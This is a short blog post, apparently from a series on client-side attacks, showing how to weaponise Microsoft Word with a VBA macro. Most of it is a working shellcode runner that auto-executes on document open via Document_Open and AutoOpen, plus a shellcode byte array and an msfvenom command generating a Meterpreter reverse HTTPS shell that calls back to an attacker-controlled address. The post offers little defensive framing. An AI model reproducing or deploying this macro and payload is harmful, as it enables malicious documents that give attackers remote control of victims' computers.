Weaponising Word With VBA

This forms part of a new series of blog posts looking at client-side attacks and evasion strategies used by hackers.



Office Products are some of the most widely utilised productivity tools around the world and, are a great targets for exploitation by hackers.


According to Statistica , Office 365 is used by over a million companies worldwide, with over 731,000 companies in the United States alone using the office suite software. Canada ranks third in users at just over 83,000, behind the United Kingdom at approximately 187,000. In terms of actual users, there are 1.2 billion worldwide ..

Most users operate the office apps in their native desktop versions on their devices rather than using the less mature and feature-rich browser app. When looking at a target for client-side attacks, the data shows that the desktop office apps would be a prioritised target.


The evil macro below shows how this can be exploited with VBA.


Code Example


The code below is a shellcode runner, a piece of code that executes shellcode in memory that has been built using VBA. The typical approach is to use three Win32 APIs from Kernel32.dll:

  • VirtualAlloc,

  • RtlMoveMemory

  • CreateThread.

VirtualAlloc is used to allocate unmanaged memory that is writable, readable, and executable. This will then be copied to the shellcode into the newly allocated memory with RtlMoveMemory.


This creates a new execution thread in the process through CreateThread to execute the VBA shellcode.


Private Declare PtrSafe Function CreateThread Lib "KERNEL32" (ByVal SecurityAttributes As Long, ByVal StackSize As Long, ByVal StartFunction As LongPtr, ThreadParameter As LongPtr, ByVal CreateFlags As Long, ByRef ThreadId As Long) As LongPtr

Private Declare PtrSafe Function VirtualAlloc Lib "KERNEL32" (ByVal lpAddress As LongPtr, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPtr

Private Declare PtrSafe Function RtlMoveMemory Lib "KERNEL32" (ByVal lDestination As LongPtr, ByRef sSource As Any, ByVal lLength As Long) As LongPtr

Function MyMacro()
    Dim buf As Variant
    Dim addr As LongPtr
    Dim counter As Long
    Dim data As Long
    Dim res As Long
    
    buf = Array(232, 130, 0, 0, 0, 96, 137, 229, 49, 192, 100, 139, 80, 48, 139, 82, 12, 139, 82, 20, 139, 114, 40, 15, 183, 74, 38, 49, 255, 172, 60, 97, 124, 2, 44, 32, 193, 207, 13, 1, 199, 226, 242, 82, 87, 139, 82, 16, 139, 74, 60, 139, 76, 17, 120, 227, 72, 1, 209, 81, 139, 89, 32, 1, 211, 139, 73, 24, 227, 58, 73, 139, 52, 139, 1, 214, 49, 255, 172, 193, _
...
49, 57, 50, 46, 49, 54, 56, 46, 49, 55, 54, 46, 49, 52, 50, 0, 187, 224, 29, 42, 10, 104, 166, 149, 189, 157, 255, 213, 60, 6, 124, 10, 128, 251, 224, 117, 5, 187, 71, 19, 114, 111, 106, 0, 83, 255, 213)..<SNIP>

    addr = VirtualAlloc(0, UBound(buf), &H3000, &H40)
    
    For counter = LBound(buf) To UBound(buf)
        data = buf(counter)
        res = RtlMoveMemory(addr + counter, data, 1)
    Next counter
    
    res = CreateThread(0, 0, addr, 0, 0, 0)
End Function 

Sub Document_Open()
    MyMacro
End Sub

Sub AutoOpen()
    MyMacro
End Sub





The Payload


In order to generate the shellcode, we need to know the target architecture. Obviously we are targeting a 64-bit Windows machine, but Microsoft Word 2016 installs as 32-bit by default, so we will generate 32-bit shellcode.

We'll use msfvenom to generate shellcode formatted as vbapplication, as the first stage of a Meterpreter shell.

Since we will be executing our shellcode inside the Word application, we specify the EXITFUNC with a value of "thread" instead of the default value of "process" to avoid closing Microsoft Word when the shellcode exits.


msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.49.64 LPORT=443 EXITFUNC=thread -f vbapplication



Video Example




6 views0 comments

Recent Posts

See All

This forms part of a new series of blog posts looking at client-side attacks and evasion strategies used by hackers. Running Shell Code in C# Over the last few weeks, we have been building payloads an

This forms part of a new series of blog posts looking at client-side attacks and evasion strategies used by hackers. Running Shell Code in C# Using lessons learnt from the last few weeks from both VBA

This forms part of a new series of blog posts looking at client-side attacks and evasion strategies used by hackers. When looking at exploiting operating systems and conducting client-side attacks it